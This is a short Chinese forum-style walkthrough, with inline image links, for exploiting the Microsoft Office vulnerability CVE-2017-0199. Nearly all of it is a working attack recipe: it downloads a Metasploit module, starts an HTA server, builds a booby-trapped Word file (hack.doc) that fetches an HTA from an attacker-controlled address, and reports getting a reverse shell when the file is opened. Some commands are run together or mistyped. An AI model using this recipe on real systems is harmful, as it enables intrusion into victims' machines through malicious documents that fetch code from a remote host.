CVE-2017-0199利用
CVE-2017-0199利用
1下载利用脚本wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
2复制脚本cp office_word_hta.rb /usr/share/metasploitframework/modules/exploits/windows/fileformathttps://mmbiz.qlogo.cn/mmbiz_png/MJibEY9Rz0czxUgawv2O0UO6LCaZDqmtia2Wl2La4gl1tVbeuLPic3nDLvmZYeSsTQcACVRqIdv1JrNtUOyEMDJ5g/0?wx_fmt=png
3生成HTA1:运行msfconsle2:search hta_server
3:set SRVHOST 192.168.5.2094;runhttps://mmbiz.qlogo.cn/mmbiz_png/MJibEY9Rz0czxUgawv2O0UO6LCaZDqmtiaPLibZoiaaic9eD78rlxN0qh27W1D23QXzzvmwaia03vF5ib0sVicCniafvQ8A/0?wx_fmt=png
4生成doc1:use exploit/windows/fileformat/office_word_hta2:set TARGETURI http://192.168.5.209:8082/52jdF5Inq.hta3:set FILENAME hack.dochttps://mmbiz.qlogo.cn/mmbiz_png/MJibEY9Rz0czxUgawv2O0UO6LCaZDqmtiaoe7VUOkzRKiawZ54AMFs814z9e3O8QwoIGYSv0SLPR8O8seliaVVlM7Q/0?wx_fmt=png
5运行文件https://mmbiz.qlogo.cn/mmbiz_png/MJibEY9Rz0czxUgawv2O0UO6LCaZDqmtiaT5CgBmBbGPUpXgLem84wLlmCR5iaDNFjh6WVGXXiaUy02H2osdC58ic3A/0?wx_fmt=png成功得到反弹
https://mmbiz.qlogo.cn/mmbiz_png/MJibEY9Rz0czxUgawv2O0UO6LCaZDqmtiaWk6fb0kMrtBkydspYDLC9umF5zuiase44aN2EpicvtBialia2xZTfxJouw/0?wx_fmt=png
页:
[1]